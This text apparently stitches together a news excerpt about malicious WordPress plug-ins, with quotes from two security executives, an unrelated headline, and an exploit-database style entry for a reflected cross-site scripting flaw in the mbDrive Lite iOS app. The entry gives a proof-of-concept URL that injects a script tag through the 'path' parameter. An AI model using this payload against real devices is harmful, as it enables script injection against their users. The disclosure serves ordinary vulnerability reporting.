Vulnerable plug-ins are not the only concern for WordPress sites; malicious plug-ins are another issue. A large-scale study of over 400,000 websites that researchers at the Georgia Institute of Technology conducted uncovered a staggering 47,337 malicious plug-ins installed on 24,931 websites, most of them still active.

Sounil Yu, CISO at JupiterOne, says the risks inherent in WordPress environments are like those present in any environment that leverages plug-ins, integrations, and third-party applications to extend functionality.

"As with smartphones, such third-party components extend the capabilities of the core product, but they are also problematic for security teams because they significantly increase the attack surface of the core product," he explains, adding that vetting these products is also challenging because of their sheer number and lack of clear provenance.

"Security teams have rudimentary approaches, most often giving a cursory look at what I call the three Ps: popularity, purpose, and permissions," Yu notes. "Similar to app stores managed by Apple and Google, more vetting needs to be done by the marketplaces to ensure that malicious \[plug-ins, integrations, and third-party apps\] do not create problems for their customers," he notes.

Another problem is that while WordPress is widely used, it often is managed by marketing or Web-design professionals and not IT or security professionals, says Bud Broomhead, CEO at Viakoo.

"Installing is easy and removing is an afterthought or never done," Broomhead tells Dark Reading. "Just like the attack surface has shifted to IoT/OT/ICS, threat actors aim for systems not managed by IT, especially ones that are widely used like WordPress."

Broomhead adds, "Even with WordPress issuing alerts about plug-ins being vulnerabilities, other priorities than security may delay the removal of malicious plug-ins."

Attackers Exploit Zero-Day WordPress Plug-in Vulnerability in BackupBuddy

mbDrive Lite WiFi Flash Disk version 1.4.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage:https://apps.apple.com/us/developer/haw-yuan-yang/id291212805# Software Link:https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033# Version: 1.4.0# Tested on: iPhone ios 15.6poc:http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

Tag

#apple